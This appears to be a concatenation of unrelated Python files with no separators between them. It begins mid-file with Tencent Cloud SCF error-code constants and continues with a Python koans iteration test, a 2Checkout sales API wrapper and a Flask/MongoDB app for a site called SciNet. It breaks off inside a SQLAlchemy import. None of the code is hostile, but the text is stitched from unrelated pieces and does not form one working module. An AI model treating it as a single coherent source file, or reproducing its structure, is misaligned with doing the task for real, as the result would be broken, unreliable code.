INVALIDPARAMETERVALUE_CLS = 'InvalidParameterValue.Cls'

# 修改Cls配置需要传入Role参数，请修正后重试。
INVALIDPARAMETERVALUE_CLSROLE = 'InvalidParameterValue.ClsRole'

# Cmq传入错误。
INVALIDPARAMETERVALUE_CMQ = 'InvalidParameterValue.Cmq'

# Code传入错误。
INVALIDPARAMETERVALUE_CODE = 'InvalidParameterValue.Code'

# CodeSecret传入错误。
INVALIDPARAMETERVALUE_CODESECRET = 'InvalidParameterValue.CodeSecret'

# CodeSource传入错误。
INVALIDPARAMETERVALUE_CODESOURCE = 'InvalidParameterValue.CodeSource'

# Command[Entrypoint] 参数值有误。
INVALIDPARAMETERVALUE_COMMAND = 'InvalidParameterValue.Command'

# CompatibleRuntimes参数传入错误。
INVALIDPARAMETERVALUE_COMPATIBLERUNTIMES = 'InvalidParameterValue.CompatibleRuntimes'

# Content参数传入错误。
INVALIDPARAMETERVALUE_CONTENT = 'InvalidParameterValue.Content'

# Cos传入错误。
INVALIDPARAMETERVALUE_COS = 'InvalidParameterValue.Cos'

# CosBucketName不符合规范。
INVALIDPARAMETERVALUE_COSBUCKETNAME = 'InvalidParameterValue.CosBucketName'

# CosBucketRegion取值与规范不符，请修正后再试。可参考：https://tencentcs.com/5jXKFnBW。
INVALIDPARAMETERVALUE_COSBUCKETREGION = 'InvalidParameterValue.CosBucketRegion'

# CosObjectName不符合规范。
INVALIDPARAMETERVALUE_COSOBJECTNAME = 'InvalidParameterValue.CosObjectName'

# CustomArgument参数长度超限。
INVALIDPARAMETERVALUE_CUSTOMARGUMENT = 'InvalidParameterValue.CustomArgument'

# DateTime传入错误。
INVALIDPARAMETERVALUE_DATETIME = 'InvalidParameterValue.DateTime'

# DeadLetterConfig取值与规范不符，请修正后再试。可参考：https://tencentcs.com/5jXKFnBW。
INVALIDPARAMETERVALUE_DEADLETTERCONFIG = 'InvalidParameterValue.DeadLetterConfig'

# 默认Namespace无法创建。
INVALIDPARAMETERVALUE_DEFAULTNAMESPACE = 'InvalidParameterValue.DefaultNamespace'

# Description传入错误。
INVALIDPARAMETERVALUE_DESCRIPTION = 'InvalidParameterValue.Description'

# 环境变量DNS[OS_NAMESERVER]配置有误。
INVALIDPARAMETERVALUE_DNSINFO = 'InvalidParameterValue.DnsInfo'

# EipConfig参数错误。
INVALIDPARAMETERVALUE_EIPCONFIG = 'InvalidParameterValue.EipConfig'

# Enable取值与规范不符，请修正后再试。可参考：https://tencentcs.com/5jXKFnBW。
INVALIDPARAMETERVALUE_ENABLE = 'InvalidParameterValue.Enable'

# Environment传入错误。
INVALIDPARAMETERVALUE_ENVIRONMENT = 'InvalidParameterValue.Environment'

# 环境变量大小超限，请保持在 4KB 以内。
INVALIDPARAMETERVALUE_ENVIRONMENTEXCEEDEDLIMIT = 'InvalidParameterValue.EnvironmentExceededLimit'

# 不支持修改函数系统环境变量和运行环境变量。
INVALIDPARAMETERVALUE_ENVIRONMENTSYSTEMPROTECT = 'InvalidParameterValue.EnvironmentSystemProtect'

# Filters参数错误。
INVALIDPARAMETERVALUE_FILTERS = 'InvalidParameterValue.Filters'

# Function取值与规范不符，请修正后再试。可参考：https://tencentcs.com/5jXKFnBW。
INVALIDPARAMETERVALUE_FUNCTION = 'InvalidParameterValue.Function'

# 函数不存在。
INVALIDPARAMETERVALUE_FUNCTIONNAME = 'InvalidParameterValue.FunctionName'

# GitBranch不符合规范。
INVALIDPARAMETERVALUE_GITBRANCH = 'InvalidParameterValue.GitBranch'

# GitCommitId取值与规范不符，请修正后再试。可参考：https://tencentcs.com/5jXKFnBW。
INVALIDPARAMETERVALUE_GITCOMMITID = 'InvalidParameterValue.GitCommitId'

# GitDirectory不符合规范。
INVALIDPARAMETERVALUE_GITDIRECTORY = 'InvalidParameterValue.GitDirectory'

# GitPassword不符合规范。
INVALIDPARAMETERVALUE_GITPASSWORD = 'InvalidParameterValue.GitPassword'

# GitUrl不符合规范。
INVALIDPARAMETERVALUE_GITURL = 'InvalidParameterValue.GitUrl'

# GitUserName不符合规范。
INVALIDPARAMETERVALUE_GITUSERNAME = 'InvalidParameterValue.GitUserName'

# Handler传入错误。
INVALIDPARAMETERVALUE_HANDLER = 'InvalidParameterValue.Handler'

# IdleTimeOut参数传入错误。
INVALIDPARAMETERVALUE_IDLETIMEOUT = 'InvalidParameterValue.IdleTimeOut'

# imageUri 传入有误。
INVALIDPARAMETERVALUE_IMAGEURI = 'InvalidParameterValue.ImageUri'

# InlineZipFile非法。
INVALIDPARAMETERVALUE_INLINEZIPFILE = 'InvalidParameterValue.InlineZipFile'

# InvokeType取值与规范不符，请修正后再试。
INVALIDPARAMETERVALUE_INVOKETYPE = 'InvalidParameterValue.InvokeType'

# L5Enable取值与规范不符，请修正后再试。
INVALIDPARAMETERVALUE_L5ENABLE = 'InvalidParameterValue.L5Enable'

# LayerName参数传入错误。
INVALIDPARAMETERVALUE_LAYERNAME = 'InvalidParameterValue.LayerName'

# Layers参数传入错误。
INVALIDPARAMETERVALUE_LAYERS = 'InvalidParameterValue.Layers'

# Limit传入错误。
INVALIDPARAMETERVALUE_LIMIT = 'InvalidParameterValue.Limit'

# 参数超出长度限制。
INVALIDPARAMETERVALUE_LIMITEXCEEDED = 'InvalidParameterValue.LimitExceeded'

# Memory取值与规范不符，请修正后再试。可参考：https://tencentcs.com/5jXKFnBW。
INVALIDPARAMETERVALUE_MEMORY = 'InvalidParameterValue.Memory'

# MemorySize错误。
INVALIDPARAMETERVALUE_MEMORYSIZE = 'InvalidParameterValue.MemorySize'

# MinCapacity 参数传入错误。
INVALIDPARAMETERVALUE_MINCAPACITY = 'InvalidParameterValue.MinCapacity'

# Name参数传入错误。
INVALIDPARAMETERVALUE_NAME = 'InvalidParameterValue.Name'

# Namespace参数传入错误。
INVALIDPARAMETERVALUE_NAMESPACE = 'InvalidParameterValue.Namespace'

# 规则不正确，Namespace为英文字母、数字、-_ 符号组成，长度30。
INVALIDPARAMETERVALUE_NAMESPACEINVALID = 'InvalidParameterValue.NamespaceInvalid'

# NodeSpec 参数传入错误。
INVALIDPARAMETERVALUE_NODESPEC = 'InvalidParameterValue.NodeSpec'

# NodeType 参数传入错误。
INVALIDPARAMETERVALUE_NODETYPE = 'InvalidParameterValue.NodeType'

# 偏移量不合法。
INVALIDPARAMETERVALUE_OFFSET = 'InvalidParameterValue.Offset'

# Order传入错误。
INVALIDPARAMETERVALUE_ORDER = 'InvalidParameterValue.Order'

# OrderBy取值与规范不符，请修正后再试。可参考：https://tencentcs.com/5jXKFnBW。
INVALIDPARAMETERVALUE_ORDERBY = 'InvalidParameterValue.OrderBy'

# 入参不是标准的json。
INVALIDPARAMETERVALUE_PARAM = 'InvalidParameterValue.Param'

# ProtocolType参数传入错误。
INVALIDPARAMETERVALUE_PROTOCOLTYPE = 'InvalidParameterValue.ProtocolType'

# 定时预置的cron配置重复。
INVALIDPARAMETERVALUE_PROVISIONTRIGGERCRONCONFIGDUPLICATE = 'InvalidParameterValue.ProvisionTriggerCronConfigDuplicate'

# TriggerName参数传入错误。
INVALIDPARAMETERVALUE_PROVISIONTRIGGERNAME = 'InvalidParameterValue.ProvisionTriggerName'

# TriggerName重复。
INVALIDPARAMETERVALUE_PROVISIONTRIGGERNAMEDUPLICATE = 'InvalidParameterValue.ProvisionTriggerNameDuplicate'

# ProvisionType 参数传入错误。
INVALIDPARAMETERVALUE_PROVISIONTYPE = 'InvalidParameterValue.ProvisionType'

# PublicNetConfig参数错误。
INVALIDPARAMETERVALUE_PUBLICNETCONFIG = 'InvalidParameterValue.PublicNetConfig'

# 不支持的函数版本。
INVALIDPARAMETERVALUE_QUALIFIER = 'InvalidParameterValue.Qualifier'

# 企业版镜像实例ID[RegistryId]传值错误。
INVALIDPARAMETERVALUE_REGISTRYID = 'InvalidParameterValue.RegistryId'

# RetCode不合法。
INVALIDPARAMETERVALUE_RETCODE = 'InvalidParameterValue.RetCode'

# RoutingConfig取值与规范不符，请修正后再试。可参考：https://tencentcs.com/5jXKFnBW。
INVALIDPARAMETERVALUE_ROUTINGCONFIG = 'InvalidParameterValue.RoutingConfig'

# Runtime传入错误。
INVALIDPARAMETERVALUE_RUNTIME = 'InvalidParameterValue.Runtime'

# searchkey 不是 Keyword,Tag 或者 Runtime。
INVALIDPARAMETERVALUE_SEARCHKEY = 'InvalidParameterValue.SearchKey'

# SecretInfo错误。
INVALIDPARAMETERVALUE_SECRETINFO = 'InvalidParameterValue.SecretInfo'

# ServiceName命名不规范。
INVALIDPARAMETERVALUE_SERVICENAME = 'InvalidParameterValue.ServiceName'

# Stamp取值与规范不符，请修正后再试。
INVALIDPARAMETERVALUE_STAMP = 'InvalidParameterValue.Stamp'

# 起始时间传入错误。
INVALIDPARAMETERVALUE_STARTTIME = 'InvalidParameterValue.StartTime'

# 需要同时指定开始日期与结束日期。
INVALIDPARAMETERVALUE_STARTTIMEORENDTIME = 'InvalidParameterValue.StartTimeOrEndTime'

# Status取值与规范不符，请修正后再试。
INVALIDPARAMETERVALUE_STATUS = 'InvalidParameterValue.Status'

# 系统环境变量错误。
INVALIDPARAMETERVALUE_SYSTEMENVIRONMENT = 'InvalidParameterValue.SystemEnvironment'

# 非法的TempCosObjectName。
INVALIDPARAMETERVALUE_TEMPCOSOBJECTNAME = 'InvalidParameterValue.TempCosObjectName'

# TraceEnable取值与规范不符，请修正后再试。
INVALIDPARAMETERVALUE_TRACEENABLE = 'InvalidParameterValue.TraceEnable'

# TrackingTarget 参数输入错误。
INVALIDPARAMETERVALUE_TRACKINGTARGET = 'InvalidParameterValue.TrackingTarget'

# TriggerCronConfig参数传入错误。
INVALIDPARAMETERVALUE_TRIGGERCRONCONFIG = 'InvalidParameterValue.TriggerCronConfig'

# TriggerCronConfig参数定时触发间隔小于指定值。
INVALIDPARAMETERVALUE_TRIGGERCRONCONFIGTIMEINTERVAL = 'InvalidParameterValue.TriggerCronConfigTimeInterval'

# TriggerDesc传入参数错误。
INVALIDPARAMETERVALUE_TRIGGERDESC = 'InvalidParameterValue.TriggerDesc'

# TriggerName传入错误。
INVALIDPARAMETERVALUE_TRIGGERNAME = 'InvalidParameterValue.TriggerName'

# TriggerProvisionedConcurrencyNum参数传入错误。
INVALIDPARAMETERVALUE_TRIGGERPROVISIONEDCONCURRENCYNUM = 'InvalidParameterValue.TriggerProvisionedConcurrencyNum'

# Type传入错误。
INVALIDPARAMETERVALUE_TYPE = 'InvalidParameterValue.Type'

# 开启cfs配置的同时必须开启vpc。
INVALIDPARAMETERVALUE_VPCNOTSETWHENOPENCFS = 'InvalidParameterValue.VpcNotSetWhenOpenCfs'

# WebSocketsParams参数传入错误。
INVALIDPARAMETERVALUE_WEBSOCKETSPARAMS = 'InvalidParameterValue.WebSocketsParams'

# 检测到不是标准的zip文件，请重新压缩后再试。
INVALIDPARAMETERVALUE_ZIPFILE = 'InvalidParameterValue.ZipFile'

# 压缩文件base64解码失败: `Incorrect padding`，请修正后再试。
INVALIDPARAMETERVALUE_ZIPFILEBASE64BINASCIIERROR = 'InvalidParameterValue.ZipFileBase64BinasciiError'

# 别名个数超过最大限制。
LIMITEXCEEDED_ALIAS = 'LimitExceeded.Alias'

# Cdn使用超过最大限制。
LIMITEXCEEDED_CDN = 'LimitExceeded.Cdn'

# eip资源超限。
LIMITEXCEEDED_EIP = 'LimitExceeded.Eip'

# 函数数量超出最大限制 ，可通过[提交工单](https://cloud.tencent.com/act/event/Online_service?from=scf%7Cindex)申请提升限制。
LIMITEXCEEDED_FUNCTION = 'LimitExceeded.Function'

# 同一个主题下的函数超过最大限制。
LIMITEXCEEDED_FUNCTIONONTOPIC = 'LimitExceeded.FunctionOnTopic'

# FunctionProvisionedConcurrencyMemory数量达到限制，可提交工单申请提升限制：https://tencentcs.com/7Fixwt63。
LIMITEXCEEDED_FUNCTIONPROVISIONEDCONCURRENCYMEMORY = 'LimitExceeded.FunctionProvisionedConcurrencyMemory'

# 函数保留并发内存超限。
LIMITEXCEEDED_FUNCTIONRESERVEDCONCURRENCYMEMORY = 'LimitExceeded.FunctionReservedConcurrencyMemory'

# FunctionTotalProvisionedConcurrencyMemory达到限制，可提交工单申请提升限制：https://tencentcs.com/7Fixwt63。
LIMITEXCEEDED_FUNCTIONTOTALPROVISIONEDCONCURRENCYMEMORY = 'LimitExceeded.FunctionTotalProvisionedConcurrencyMemory'

# 函数预置并发总数达到限制。
LIMITEXCEEDED_FUNCTIONTOTALPROVISIONEDCONCURRENCYNUM = 'LimitExceeded.FunctionTotalProvisionedConcurrencyNum'

# InitTimeout达到限制，可提交工单申请提升限制：https://tencentcs.com/7Fixwt63。
LIMITEXCEEDED_INITTIMEOUT = 'LimitExceeded.InitTimeout'

# layer版本数量超出最大限制。
LIMITEXCEEDED_LAYERVERSIONS = 'LimitExceeded.LayerVersions'

# layer数量超出最大限制。
LIMITEXCEEDED_LAYERS = 'LimitExceeded.Layers'

# 内存超出最大限制。
LIMITEXCEEDED_MEMORY = 'LimitExceeded.Memory'

# 函数异步重试配置消息保留时间超过限制。
LIMITEXCEEDED_MSGTTL = 'LimitExceeded.MsgTTL'

# 命名空间数量超过最大限制，可通过[提交工单](https://cloud.tencent.com/act/event/Online_service?from=scf%7Cindex)申请提升限制。
LIMITEXCEEDED_NAMESPACE = 'LimitExceeded.Namespace'

# Offset超出限制。
LIMITEXCEEDED_OFFSET = 'LimitExceeded.Offset'

# 定时预置数量超过最大限制。
LIMITEXCEEDED_PROVISIONTRIGGERACTION = 'LimitExceeded.ProvisionTriggerAction'

# 定时触发间隔小于最大限制。
LIMITEXCEEDED_PROVISIONTRIGGERINTERVAL = 'LimitExceeded.ProvisionTriggerInterval'

# 配额超限。
LIMITEXCEEDED_QUOTA = 'LimitExceeded.Quota'

# 函数异步重试配置异步重试次数超过限制。
LIMITEXCEEDED_RETRYNUM = 'LimitExceeded.RetryNum'

# Timeout超出最大限制。
LIMITEXCEEDED_TIMEOUT = 'LimitExceeded.Timeout'

# 用户并发内存配额超限。
LIMITEXCEEDED_TOTALCONCURRENCYMEMORY = 'LimitExceeded.TotalConcurrencyMemory'

# 触发器数量超出最大限制，可通过[提交工单](https://cloud.tencent.com/act/event/Online_service?from=scf%7Cindex)申请提升限制。
LIMITEXCEEDED_TRIGGER = 'LimitExceeded.Trigger'

# UserTotalConcurrencyMemory达到限制，可提交工单申请提升限制：https://tencentcs.com/7Fixwt63。
LIMITEXCEEDED_USERTOTALCONCURRENCYMEMORY = 'LimitExceeded.UserTotalConcurrencyMemory'

# 缺少参数错误。
MISSINGPARAMETER = 'MissingParameter'

# Code没有传入。
MISSINGPARAMETER_CODE = 'MissingParameter.Code'

# 缺失 Runtime 字段。
MISSINGPARAMETER_RUNTIME = 'MissingParameter.Runtime'

# 资源被占用。
RESOURCEINUSE = 'ResourceInUse'

# Alias已被占用。
RESOURCEINUSE_ALIAS = 'ResourceInUse.Alias'

# Cdn已被占用。
RESOURCEINUSE_CDN = 'ResourceInUse.Cdn'

# Cmq已被占用。
RESOURCEINUSE_CMQ = 'ResourceInUse.Cmq'

# Cos已被占用。
RESOURCEINUSE_COS = 'ResourceInUse.Cos'

# 函数已存在。
RESOURCEINUSE_FUNCTION = 'ResourceInUse.Function'

# FunctionName已存在。
RESOURCEINUSE_FUNCTIONNAME = 'ResourceInUse.FunctionName'

# Layer版本正在使用中。
RESOURCEINUSE_LAYERVERSION = 'ResourceInUse.LayerVersion'

# Namespace已存在。
RESOURCEINUSE_NAMESPACE = 'ResourceInUse.Namespace'

# TriggerName已存在。
RESOURCEINUSE_TRIGGER = 'ResourceInUse.Trigger'

# TriggerName已存在。
RESOURCEINUSE_TRIGGERNAME = 'ResourceInUse.TriggerName'

# COS资源不足。
RESOURCEINSUFFICIENT_COS = 'ResourceInsufficient.COS'

# 资源不存在。
RESOURCENOTFOUND = 'ResourceNotFound'

# 别名不存在。
RESOURCENOTFOUND_ALIAS = 'ResourceNotFound.Alias'

# 未找到指定的AsyncEvent，请创建后再试。
RESOURCENOTFOUND_ASYNCEVENT = 'ResourceNotFound.AsyncEvent'

# Cdn不存在。
RESOURCENOTFOUND_CDN = 'ResourceNotFound.Cdn'

# 指定的cfs下未找到您所指定的挂载点。
RESOURCENOTFOUND_CFSMOUNTINSNOTMATCH = 'ResourceNotFound.CfsMountInsNotMatch'

# 检测cfs状态为不可用。
RESOURCENOTFOUND_CFSSTATUSERROR = 'ResourceNotFound.CfsStatusError'

# cfs与云函数所处vpc不一致。
RESOURCENOTFOUND_CFSVPCNOTMATCH = 'ResourceNotFound.CfsVpcNotMatch'

# Ckafka不存在。
RESOURCENOTFOUND_CKAFKA = 'ResourceNotFound.Ckafka'

# Cmq不存在。
RESOURCENOTFOUND_CMQ = 'ResourceNotFound.Cmq'

# Cos不存在。
RESOURCENOTFOUND_COS = 'ResourceNotFound.Cos'

# 不存在的Demo。
RESOURCENOTFOUND_DEMO = 'ResourceNotFound.Demo'

# 函数不存在。
RESOURCENOTFOUND_FUNCTION = 'ResourceNotFound.Function'

# 函数不存在。
RESOURCENOTFOUND_FUNCTIONNAME = 'ResourceNotFound.FunctionName'

# 函数版本不存在。
RESOURCENOTFOUND_FUNCTIONVERSION = 'ResourceNotFound.FunctionVersion'

# 获取cfs挂载点信息错误。
RESOURCENOTFOUND_GETCFSMOUNTINSERROR = 'ResourceNotFound.GetCfsMountInsError'

# 获取cfs信息错误。
RESOURCENOTFOUND_GETCFSNOTMATCH = 'ResourceNotFound.GetCfsNotMatch'

# 未找到指定的ImageConfig，请创建后再试。
RESOURCENOTFOUND_IMAGECONFIG = 'ResourceNotFound.ImageConfig'

# layer不存在。
RESOURCENOTFOUND_LAYER = 'ResourceNotFound.Layer'

# Layer版本不存在。
RESOURCENOTFOUND_LAYERVERSION = 'ResourceNotFound.LayerVersion'

# Namespace不存在。
RESOURCENOTFOUND_NAMESPACE = 'ResourceNotFound.Namespace'

# 版本不存在。
RESOURCENOTFOUND_QUALIFIER = 'ResourceNotFound.Qualifier'

# 角色不存在。
RESOURCENOTFOUND_ROLE = 'ResourceNotFound.Role'

# Role不存在。
RESOURCENOTFOUND_ROLECHECK = 'ResourceNotFound.RoleCheck'

# Timer不存在。
RESOURCENOTFOUND_TIMER = 'ResourceNotFound.Timer'

# 并发内存配额资源未找到。
RESOURCENOTFOUND_TOTALCONCURRENCYMEMORY = 'ResourceNotFound.TotalConcurrencyMemory'

# 触发器不存在。
RESOURCENOTFOUND_TRIGGER = 'ResourceNotFound.Trigger'

# 版本不存在。
RESOURCENOTFOUND_VERSION = 'ResourceNotFound.Version'

# VPC或子网不存在。
RESOURCENOTFOUND_VPC = 'ResourceNotFound.Vpc'

# 余额不足，请先充值。
RESOURCEUNAVAILABLE_INSUFFICIENTBALANCE = 'ResourceUnavailable.InsufficientBalance'

# Namespace不可用。
RESOURCEUNAVAILABLE_NAMESPACE = 'ResourceUnavailable.Namespace'

# 未授权操作。
UNAUTHORIZEDOPERATION = 'UnauthorizedOperation'

# CAM鉴权失败。
UNAUTHORIZEDOPERATION_CAM = 'UnauthorizedOperation.CAM'

# 无访问代码权限。
UNAUTHORIZEDOPERATION_CODESECRET = 'UnauthorizedOperation.CodeSecret'

# 没有权限。
UNAUTHORIZEDOPERATION_CREATETRIGGER = 'UnauthorizedOperation.CreateTrigger'

# 没有权限的操作。
UNAUTHORIZEDOPERATION_DELETEFUNCTION = 'UnauthorizedOperation.DeleteFunction'

# 没有权限。
UNAUTHORIZEDOPERATION_DELETETRIGGER = 'UnauthorizedOperation.DeleteTrigger'

# 不是从控制台调用的该接口。
UNAUTHORIZEDOPERATION_NOTMC = 'UnauthorizedOperation.NotMC'

# Region错误。
UNAUTHORIZEDOPERATION_REGION = 'UnauthorizedOperation.Region'

# 没有权限访问您的Cos资源。
UNAUTHORIZEDOPERATION_ROLE = 'UnauthorizedOperation.Role'

# TempCos的Appid和请求账户的APPID不一致。
UNAUTHORIZEDOPERATION_TEMPCOSAPPID = 'UnauthorizedOperation.TempCosAppid'

# 无法进行此操作。
UNAUTHORIZEDOPERATION_UPDATEFUNCTIONCODE = 'UnauthorizedOperation.UpdateFunctionCode'

# 操作不支持。
UNSUPPORTEDOPERATION = 'UnsupportedOperation'

# 资源还有别名绑定，不支持当前操作，请解绑别名后重试。
UNSUPPORTEDOPERATION_ALIASBIND = 'UnsupportedOperation.AliasBind'

# 指定的配置AsyncRunEnable暂不支持，请修正后再试。
UNSUPPORTEDOPERATION_ASYNCRUNENABLE = 'UnsupportedOperation.AsyncRunEnable'

# Cdn不支持。
UNSUPPORTEDOPERATION_CDN = 'UnsupportedOperation.Cdn'

# Cos操作不支持。
UNSUPPORTEDOPERATION_COS = 'UnsupportedOperation.Cos'

# 指定的配置EipFixed暂不支持。
UNSUPPORTEDOPERATION_EIPFIXED = 'UnsupportedOperation.EipFixed'

# 不支持此地域。
UNSUPPORTEDOPERATION_REGION = 'UnsupportedOperation.Region'

# Trigger操作不支持。
UNSUPPORTEDOPERATION_TRIGGER = 'UnsupportedOperation.Trigger'

# 指定的配置暂不支持，请修正后再试。
UNSUPPORTEDOPERATION_UPDATEFUNCTIONEVENTINVOKECONFIG = 'UnsupportedOperation.UpdateFunctionEventInvokeConfig'

# 指定的配置VpcConfig暂不支持。
UNSUPPORTEDOPERATION_VPCCONFIG = 'UnsupportedOperation.VpcConfig'

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from runner.koan import *

class AboutIteration(Koan):

    def test_iterators_are_a_type(self):
        it = iter(range(1,6))

        total = 0

        for num in it:
            total += num

        self.assertEqual(15 , total)

    def test_iterating_with_next(self):
        stages = iter(['alpha','beta','gamma'])

        try:
            self.assertEqual('alpha', next(stages))
            next(stages)
            self.assertEqual('gamma', next(stages))
            next(stages)
        except StopIteration as ex:
            err_msg = 'Ran out of iterations'

        self.assertRegex(err_msg, 'Ran out')

    # ------------------------------------------------------------------

    def add_ten(self, item):
        return item + 10

    def test_map_transforms_elements_of_a_list(self):
        seq = [1, 2, 3]
        mapped_seq = list()

        mapping = map(self.add_ten, seq)

        self.assertNotEqual(list, mapping.__class__)
        self.assertEqual(map, mapping.__class__)
        # In Python 3 built in iterator funcs return iterable view objects
        # instead of lists

        for item in mapping:
            mapped_seq.append(item)

        self.assertEqual([11, 12, 13], mapped_seq)

        # Note, iterator methods actually return objects of iter type in
        # python 3. In python 2 map() would give you a list.

    def test_filter_selects_certain_items_from_a_list(self):
        def is_even(item):
            return (item % 2) == 0

        seq = [1, 2, 3, 4, 5, 6]
        even_numbers = list()

        for item in filter(is_even, seq):
            even_numbers.append(item)

        self.assertEqual([2,4,6], even_numbers)

    def test_just_return_first_item_found(self):
        def is_big_name(item):
            return len(item) > 4

        names = ["Jim", "Bill", "Clarence", "Doug", "Eli"]
        name = None

        iterator = filter(is_big_name, names)
        try:
            name = next(iterator)
        except StopIteration:
            msg = 'Ran out of big names'

        self.assertEqual("Clarence", name)


    # ------------------------------------------------------------------

    def add(self,accum,item):
        return accum + item

    def multiply(self,accum,item):
        return accum * item

    def test_reduce_will_blow_your_mind(self):
        import functools
        # As of Python 3 reduce() has been demoted from a builtin function
        # to the functools module.

        result = functools.reduce(self.add, [2, 3, 4])
        self.assertEqual(int, result.__class__)
        # Reduce() syntax is same as Python 2

        self.assertEqual(9, result)

        result2 = functools.reduce(self.multiply, [2, 3, 4], 1)
        self.assertEqual(24, result2)

        # Extra Credit:
        # Describe in your own words what reduce does.

    # ------------------------------------------------------------------

    def test_use_pass_for_iterations_with_no_body(self):
        for num in range(1,5):
            pass

        self.assertEqual(4, num)

    # ------------------------------------------------------------------

    def test_all_iteration_methods_work_on_any_sequence_not_just_lists(self):
        # Ranges are an iterable sequence
        result = map(self.add_ten, range(1,4))
        self.assertEqual([11, 12, 13], list(result))

        try:
            file = open("example_file.txt")

            try:
                def make_upcase(line):
                    return line.strip().upper()
                upcase_lines = map(make_upcase, file.readlines())
                self.assertEqual(["THIS", "IS", "A", "TEST"] , list(upcase_lines))
            finally:
                # Arg, this is ugly.
                # We will figure out how to fix this later.
                file.close()
        except IOError:
            # should never happen
            self.fail()

from api_request import Api
from util import Util
from twocheckout import Twocheckout


class Sale(Twocheckout):
    def __init__(self, dict_):
        super(self.__class__, self).__init__(dict_)

    @classmethod
    def find(cls, params=None):
        if params is None:
            params = dict()
        response = cls(Api.call('sales/detail_sale', params))
        return response.sale

    @classmethod
    def list(cls, params=None):
        if params is None:
            params = dict()
        response = cls(Api.call('sales/list_sales', params))
        return response.sale_summary

    def refund(self, params=None):
        if params is None:
            params = dict()
        if hasattr(self, 'lineitem_id'):
            params['lineitem_id'] = self.lineitem_id
            url = 'sales/refund_lineitem'
        elif hasattr(self, 'invoice_id'):
            params['invoice_id'] = self.invoice_id
            url = 'sales/refund_invoice'
        else:
            params['sale_id'] = self.sale_id
            url = 'sales/refund_invoice'
        return Sale(Api.call(url, params))

    def stop(self, params=None):
        if params is None:
            params = dict()
        if hasattr(self, 'lineitem_id'):
            params['lineitem_id'] = self.lineitem_id
            return Api.call('sales/stop_lineitem_recurring', params)
        elif hasattr(self, 'sale_id'):
            active_lineitems = Util.active(self)
            if dict(active_lineitems):
                result = dict()
                i = 0
                for k, v in active_lineitems.items():
                    lineitem_id = v
                    params = {'lineitem_id': lineitem_id}
                    result[i] = Api.call('sales/stop_lineitem_recurring', params)
                    i += 1
                response = { "response_code": "OK",
                             "response_message": str(len(result)) + " lineitems stopped successfully"
                }
            else:
                response = {
                    "response_code": "NOTICE",
                    "response_message": "No active recurring lineitems"
                }
        else:
            response = { "response_code": "NOTICE",
                          "response_message": "This method can only be called on a sale or lineitem"
            }
        return Sale(response)

    def active(self):
        active_lineitems = Util.active(self)
        if dict(active_lineitems):
            result = dict()
            i = 0
            for k, v in active_lineitems.items():
                lineitem_id = v
                result[i] = lineitem_id
                i += 1
            response = { "response_code": "ACTIVE",
                         "response_message": str(len(result)) + " active recurring lineitems"
            }
        else:
            response = {
                "response_code": "NOTICE","response_message":
                "No active recurring lineitems"
            }
        return Sale(response)

    def comment(self, params=None):
        if params is None:
            params = dict()
        params['sale_id'] = self.sale_id
        return Sale(Api.call('sales/create_comment', params))

    def ship(self, params=None):
        if params is None:
            params = dict()
        params['sale_id'] = self.sale_id
        return Sale(Api.call('sales/mark_shipped', params))

import json
import os

from flask import request, g, render_template, make_response, jsonify, Response
from helpers.raw_endpoint import get_id, store_json_to_file
from helpers.groups import get_groups
from json_controller import JSONController
from main import app
from pymongo import MongoClient, errors


HERE = os.path.dirname(os.path.abspath(__file__))


# setup database connection
def connect_client():
    """Connects to Mongo client"""
    try:
        return MongoClient(app.config['DB_HOST'], int(app.config['DB_PORT']))
    except errors.ConnectionFailure as e:
        raise e


def get_db():
    """Connects to Mongo database"""
    if not hasattr(g, 'mongo_client'):
        g.mongo_client = connect_client()
        g.mongo_db = getattr(g.mongo_client, app.config['DB_NAME'])
        g.groups_collection = g.mongo_db[os.environ.get('DB_GROUPS_COLLECTION')]
    return g.mongo_db

@app.teardown_appcontext
def close_db(error):
    """Closes connection with Mongo client"""
    if hasattr(g, 'mongo_client'):
        g.mongo_client.close()

# Begin view routes
@app.route('/')
@app.route('/index/')
def index():
    """Landing page for SciNet"""
    return render_template("index.html")

@app.route('/faq/')
def faq():
    """FAQ page for SciNet"""
    return render_template("faq.html")

@app.route('/leaderboard/')
def leaderboard():
    """Leaderboard page for SciNet"""
    get_db()
    groups = get_groups(g.groups_collection)
    return render_template("leaderboard.html", groups=groups)

@app.route('/ping', methods=['POST'])
def ping_endpoint():
    """API endpoint determines potential article hash exists in db

    :return: status code 204 -- hash not present, continue submission
    :return: status code 201 -- hash already exists, drop submission
    """
    db = get_db()
    target_hash = request.form.get('hash')
    if db.raw.find({'hash': target_hash}).count():
        return Response(status=201)
    else:
        return Response(status=204)

@app.route('/articles')
def ArticleEndpoint():
    """Eventual landing page for searching/retrieving articles"""
    if request.method == 'GET':
        return render_template("articles.html")

@app.route('/raw', methods=['POST'])
def raw_endpoint():
    """API endpoint for submitting raw article data

    :return: status code 405 - invalid JSON or invalid request type
    :return: status code 400 - unsupported content-type or invalid publisher
    :return: status code 201 - successful submission
    """
    # Ensure post's content-type is supported
    if request.headers['content-type'] == 'application/json':
        # Ensure data is a valid JSON
        try:
            user_submission = json.loads(request.data)
        except ValueError:
            return Response(status=405)
        # generate UID for new entry
        uid = get_id()
        # store incoming JSON in raw storage
        file_path = os.path.join(
                        HERE,
                        'raw_payloads',
                        str(uid)
                    )
        store_json_to_file(user_submission, file_path)
        # hand submission to controller and return Resposne
        db = get_db()
        controller_response = JSONController(user_submission, db=db, _id=uid).submit()
        return controller_response

    # User submitted an unsupported content-type
    else:
        return Response(status=400)

#@TODO: Implicit or Explicit group additions? Issue #51 comments on the issues page
#@TODO: Add form validation
@app.route('/requestnewgroup/', methods=['POST'])
def request_new_group():
    # Grab submission form data and prepare email message
    data = request.json
    msg = "Someone has request that you add {group_name} to the leaderboard \
        groups. The groups website is {group_website} and the submitter can \
        be reached at {submitter_email}.".format(
                                            group_name=data['new_group_name'],
                                            group_website=data['new_group_website'],
                                            submitter_email=data['submitter_email'])
    return Response(status=200)
    '''
    try:
        email(
            subject="SciNet: A new group has been requested",
            fro="no-reply@scinet.osf.io",
            to='harry@scinet.osf.io',
            msg=msg)
        return Response(status=200)
    except:
        return Response(status=500)
    '''

# Error handlers
@app.errorhandler(404)
def not_found(error):
    return make_response(jsonify( { 'error': 'Page Not Found' } ), 404)

@app.errorhandler(405)
def method_not_allowed(error):
    return make_response(jsonify( { 'error': 'Method Not Allowed' } ), 405)
from corecat.constants import OBJECT_CODES, MODEL_VERSION
from ._sqlalchemy import Base, CoreCatBaseMixin
from ._sqlalchemy import Column, \
